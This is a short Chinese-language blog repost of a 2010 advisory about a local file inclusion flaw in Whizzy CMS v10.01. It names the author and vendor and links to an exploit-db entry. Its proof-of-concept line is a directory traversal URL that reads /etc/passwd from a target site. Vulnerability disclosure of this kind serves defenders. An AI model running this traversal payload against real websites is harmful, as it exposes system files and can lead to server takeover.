Whizzy CMS v10.01 本地文件包含漏洞
发布:wpulog | 发布时间: 2010年7月16日Whizzy是一个单一文件的微型内容管理系统。它无数据库和配置文件、无需解压缩,因此,非常容易安装和删除。Whizzy是MIT许可下的自由使用。Whizzy CMS v10.01版存在本地文件包含漏洞,可能导致攻击者获取敏感信息,甚至获取WebShell。
[+]info:
~~~~~~~~~
Whizzy CMS v10.01 Local File Inclusion Vulnerability
[x] Type: Local File Inclusion
[x] Vendor: Unverse.net
[x] Script Name: Whizzy CMS
[x] Script version: 10.01
[x] Author: Anarchy Angel
[x] Mail : anarchy[dot]ang31@gmail[dot]com
[+]poc:
~~~~~~~~~
http://site.org/?[LFI]
Ex:
http://site.org/?../../../../../../../etc/passwd
[+]Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/14366
发表评论
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。